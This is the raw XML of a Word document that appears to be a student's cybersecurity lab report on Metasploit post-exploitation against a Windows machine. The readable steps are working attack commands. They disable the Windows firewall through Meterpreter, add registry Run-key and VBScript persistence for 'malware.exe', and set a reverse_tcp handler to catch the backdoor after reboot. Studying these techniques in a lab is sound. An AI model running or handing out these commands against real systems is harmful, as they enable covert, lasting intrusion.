          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6186170" cy="4005580"/>
            <wp:effectExtent l="0" t="0" r="1270" b="2540"/>
            <wp:docPr id="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8E86D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Style w:val="13"/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  <w:t>Open a Shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436EA378">
      <w:pPr>
        <w:pStyle w:val="10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Style w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03480FE2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Take ScreenShot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB11CC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  <w:t>Screenshot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C96DAD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hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">          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 xml:space="preserve">         </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5927090" cy="5541645"/>
            <wp:effectExtent l="0" t="0" r="1270" b="5715"/>
            <wp:docPr id="14" name="Picture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0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5541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21A8AF"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  <w:t>Disable firewall of window machine through meterpreter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  <w:t>execute -f "cmd.exe" -a "/c netsh advfirewall set allprofiles state off"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FDF6A2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Style w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Step 5: Enable Persistence (Kali)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D556B5D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</w:rPr>
        <w:t xml:space="preserve">Inside </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Meterpreter</w:t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>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3F4B95">
      <w:pPr>
        <w:pStyle w:val="10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Style w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>run post/windows/manage/persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A98736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</w:rPr>
        <w:t>Or manually add a registry key:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAF944D">
      <w:pPr>
        <w:pStyle w:val="10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Style w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d "C:\Users\Public\malware.exe" /f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABAA49D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Style w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Fix 2: Correct Registry Persistence Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671AB7D2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</w:rPr>
        <w:t xml:space="preserve">Your registry command is missing the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-k</w:t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 xml:space="preserve"> (key path) argument.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6856AA18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Style w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Correct command inside Meterpreter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEE6B31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</w:rPr>
        <w:t>To ensure persistence, use the following command to set a registry key that will start the malware upon user login:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751A048F">
      <w:pPr>
        <w:pStyle w:val="10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Style w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>reg setval -k HKCU\Software\Microsoft\Windows\CurrentVersion\Run -v Updater -d "C:\Users\Public\malware.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725441E2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</w:rPr>
        <w:t>✔ This command adds a registry entry that executes the malware on startup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2060BF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Style w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Check if the key was added:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E6E21B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</w:rPr>
        <w:t>To verify that the persistence registry key has been successfully set, execute the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2A2AA1">
      <w:pPr>
        <w:pStyle w:val="10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Style w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>reg queryval -k HKCU\Software\Microsoft\Windows\CurrentVersion\Run -v Updater</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB59DE5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</w:rPr>
        <w:t>✔ If the value appears, persistence is successfully configured.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7BCFBC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auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="683C711B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Style w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Fix 3: Enable Persistence Using a VBS Script (Alternative Method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606C7128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</w:rPr>
        <w:t>If you prefer an alternative method, you can use a VBScript to achieve persistence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C927BA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Style w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Inside Meterpreter, create a startup script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60668BD2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</w:rPr>
        <w:t>Execute the following command to create a VBScript file that runs the malware:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628A1290">
      <w:pPr>
        <w:pStyle w:val="10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Style w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>execute -f "cmd.exe" -a "/c echo Set WshShell = CreateObject(\"WScript.Shell\") &gt; C:\Users\Public\updater.vbs &amp; echo WshShell.Run \"C:\Users\Public\malware.exe\" &gt;&gt; C:\Users\Public\updater.vbs"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDC9827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</w:rPr>
        <w:t xml:space="preserve">✔ This script creates a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>updater.vbs</w:t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 xml:space="preserve"> file that executes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>malware.exe</w:t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 xml:space="preserve"> upon system startup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764FBCA7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Style w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Add the script to the registry for persistence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E19BD7">
      <w:pPr>
        <w:pStyle w:val="10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Style w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>reg setval -k HKCU\Software\Microsoft\Windows\CurrentVersion\Run -v Updater -d "wscript.exe C:\Users\Public\updater.vbs"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEFFD12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</w:rPr>
        <w:t>✔ This method ensures the backdoor runs in hidden mode every time the user logs in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10123DA2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</w:rPr>
        <w:t>This ensures the backdoor reopens after reboot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455CB874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Style w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Step 6: Verify Connection After Reboot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1284A454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</w:rPr>
        <w:t>Restart the Windows machine and check for a session in Metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2408C7D1">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="9"/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Style w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC39D27">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="9"/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Style w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>set payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A4BB48">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="9"/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Style w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>set LHOST 192.168.100.205</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E79F1E8">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="9"/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Style w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>set LPORT 5555</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DD3D8E">
      <w:pPr>
        <w:pStyle w:val="10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Style w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B24DBB1">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>If persistence works, the session will reconnect automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5A63B2">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers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Tasks in Lab 5: Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DD8546">
      <w:pPr>
        <w:pStyle w:val="12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rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Set Up the Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D97D18">
      <w:pPr>
        <w:pStyle w:val="12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rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Identify your Kali Linux IP address using ip a | grep inet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16150776">
      <w:pPr>
        <w:pStyle w:val="12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rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Configure a Metasploit listener to capture reverse shells.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056A4D85">
      <w:pPr>
        <w:pStyle w:val="12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rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Generate and Deliver the Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3D233D">
      <w:pPr>
        <w:pStyle w:val="12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rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Create a malicious payload using msfvenom.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2D70F9">
      <w:pPr>
        <w:pStyle w:val="12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rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Host the payload on Apache and deliver it to the target Windows machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4302ECB8">
      <w:pPr>
        <w:pStyle w:val="12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rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Execute Post-Exploitation Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6B3510">
      <w:pPr>
        <w:pStyle w:val="12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rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Use Meterpreter to gather system information, list processes, and open a command shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239960E5">
      <w:pPr>
        <w:pStyle w:val="12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rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Disable the Windows firewall to maintain access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C864BFD">
      <w:pPr>
        <w:pStyle w:val="12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rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Enable Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEA5C20">
      <w:pPr>
        <w:pStyle w:val="12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rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Automatically re-establish a session after a system reboot by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007E4D11">
      <w:pPr>
        <w:pStyle w:val="12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rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Adding a registry key to run the payload on startup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DB357C">
      <w:pPr>
        <w:pStyle w:val="12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rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Using a VBScript to maintain hidden persistence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E58E70">
      <w:pPr>
        <w:pStyle w:val="12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rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Verify Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0751821D">
      <w:pPr>
        <w:pStyle w:val="12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rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Reboot the Windows machine and ensure the session reconnects automatically through Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFDD496">
      <w:pPr>
        <w:pStyle w:val="12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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>This lab provides hands-on experience with real-world privilege escalation techniques and defense mechanisms, enhancing your cybersecurity skills.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6FD510">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="720" w:right="720" w:bottom="720" w:left="72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65BB19"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9065BB1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DC997C06"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="DC997C0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37267D0A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="37267D0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5A799511"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5A79951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770D7E85"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="770D7E8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8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7F0519"/>
    <w:rsid w:val="08A3551C"/>
    <w:rsid w:val="12BE417E"/>
    <w:rsid w:val="14216A14"/>
    <w:rsid w:val="149233AF"/>
    <w:rsid w:val="14F1166B"/>
    <w:rsid w:val="187334AB"/>
    <w:rsid w:val="1A140491"/>
    <w:rsid w:val="21E136E5"/>
    <w:rsid w:val="343A21BD"/>
    <w:rsid w:val="364B1D43"/>
    <w:rsid w:val="3DE77CAD"/>
    <w:rsid w:val="48F02994"/>
    <w:rsid w:val="493844BC"/>
    <w:rsid w:val="4A424ED9"/>
    <w:rsid w:val="557434C0"/>
    <w:rsid w:val="55B326BF"/>
    <w:rsid w:val="5EBA1FF9"/>
    <w:rsid w:val="639C3D75"/>
    <w:rsid w:val="664E2064"/>
    <w:rsid w:val="6A7F0519"/>
    <w:rsid w:val="6BC95AF1"/>
    <w:rsid w:val="6D5A4776"/>
    <w:rsid w:val="6DC463A3"/>
    <w:rsid w:val="786960B4"/>
    <w:rsid w:val="79524364"/>
    <w:rsid w:val="7E3B6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2E75B6" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28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qFormat/>
    <w:uiPriority w:val="1"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="9">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="6"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="10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1">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="6"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="12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3">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="6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662</Words>
  <Characters>4186</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>14</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>4853</CharactersWithSpaces>
  <Application>WPS Office_12.2.0.20796_F1E327BC-269C-435d-A152-05C5408002CA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2025-03-20T08:44:00Z</dcterms:created>
  <dc:creator>Moeez</dc:creator>
  <cp:lastModifiedBy>Moeez</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-29T16:31:47Z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2057-12.2.0.20796</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ICV">
    <vt:lpwstr>F8D0F89E959A45B48A8934356717FACF_13</vt:lpwstr>
  </property>
</Properties>
</file>